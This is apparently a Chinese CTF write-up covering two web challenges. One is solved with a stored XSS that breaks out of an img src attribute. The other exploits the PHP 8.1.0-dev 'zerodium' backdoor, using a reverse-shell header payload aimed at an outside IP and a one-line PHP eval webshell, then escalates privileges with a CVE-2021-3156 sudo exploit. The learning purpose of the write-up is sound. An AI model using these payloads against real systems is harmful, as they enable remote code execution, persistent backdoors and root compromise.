目录
①门酱想玩什么呢?
先试一下随便给个链接
![](https://file.jishuzhan.net/article/1758237039951613953/786ec79e9f9d5a6269f4fb13bb0ac54f.webp)
不能访问远程链接,结合评论区功能,不难联想到xss,只要给个评论区链接让门酱访问就可
我们研究下评论区
![](https://file.jishuzhan.net/article/1758237039951613953/792fadd05f097846a97bdd803e2ff838.webp)
从评论区知道,要让门酱玩元梦之星,考虑直接
<script>document.location="https://ymzx.qq.com/";</script>
尝试传了发现不能起作用跳转,估计是<>这些被html实体化了
![](https://file.jishuzhan.net/article/1758237039951613953/ffce06f3539bf8b2ea1cc32d9670dedd.webp)
那咋整呢,题目里还提供了评论插入图片功能
我们就按示例传一下(必须以http://开头,否则不能解析为图片)
![](https://file.jishuzhan.net/article/1758237039951613953/ede19de00625f970122ebf49d150d5b5.webp)
![](https://file.jishuzhan.net/article/1758237039951613953/2522f30b97ce333feb5bdc9f499e0731.webp)
链接是插入到了src中,我们可以直接用">闭合img标签
评论传
http://"><script>document.location="https://ymzx.qq.com/";</script>.png 123 /png
成功重定向到元梦之星官网
![](https://file.jishuzhan.net/article/1758237039951613953/b4eefb000480ed7b66b5a4f081dd3524.webp)
bp抓包
![](https://file.jishuzhan.net/article/1758237039951613953/bb64231bf57e5d94d0146c11dce65afd.webp)
获得该条恶意评论链接
http://node1.anna.nssctf.cn:28834/words/?title=MQ%3D%3D&content=aHR0cCUzQSUyRiUyRiUyMiUzRSUzQ3NjcmlwdCUzRWRvY3VtZW50LmxvY2F0aW9uJTNEJTIyaHR0cHMlM0ElMkYlMkZ5bXp4LnFxLmNvbSUyRiUyMiUzQiUzQyUyRnNjcmlwdCUzRS5wbmclMjAxMjMlMjAlMkZwbmc%3D
把这个链接给门酱即可获得flag
![](https://file.jishuzhan.net/article/1758237039951613953/c042ec308f59bd9ebcf3096bfb04af7c.webp)
②Becomeroot
进来直接告诉我们php版本是8.1.0-dev
![](https://file.jishuzhan.net/article/1758237039951613953/836d0844d352dac5abea60bf5039b830.webp)
PHP-8.1.0-dev 后门命令执行漏洞复现_php/8.1.0-dev-CSDN博客
User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/124.222.136.33/1337 0>&1'");
直接反弹shell,发现要提权
![](https://file.jishuzhan.net/article/1758237039951613953/1cf394e81b8ba42f8ab0e553a3c374ac.webp)
![](https://file.jishuzhan.net/article/1758237039951613953/d8996359d4339ee351b6951253fdbe26.webp)
GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令
脚本不太好整到靶机上,还是写马连webshell方便点
User-Agentt: zerodiumsystem("echo '<?php eval(\$_POST[1])?>'>/var/www/html/1.php");
![](https://file.jishuzhan.net/article/1758237039951613953/34e4ed632ee3ee540dcbe1b57c2c0f95.webp)
![](https://file.jishuzhan.net/article/1758237039951613953/5c7110ac5c4f7f5809763245ee809c7d.webp)
尝试用suid提权插件来整,失败
![](https://file.jishuzhan.net/article/1758237039951613953/137885269a1650e788b7a2173e3435d8.webp)
GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令 脚本传到服务器
提权执行命令(环境没了,借了别的师傅的图)
![](https://file.jishuzhan.net/article/1758237039951613953/40124ec6e7519045b785046e5524b9fa.webp)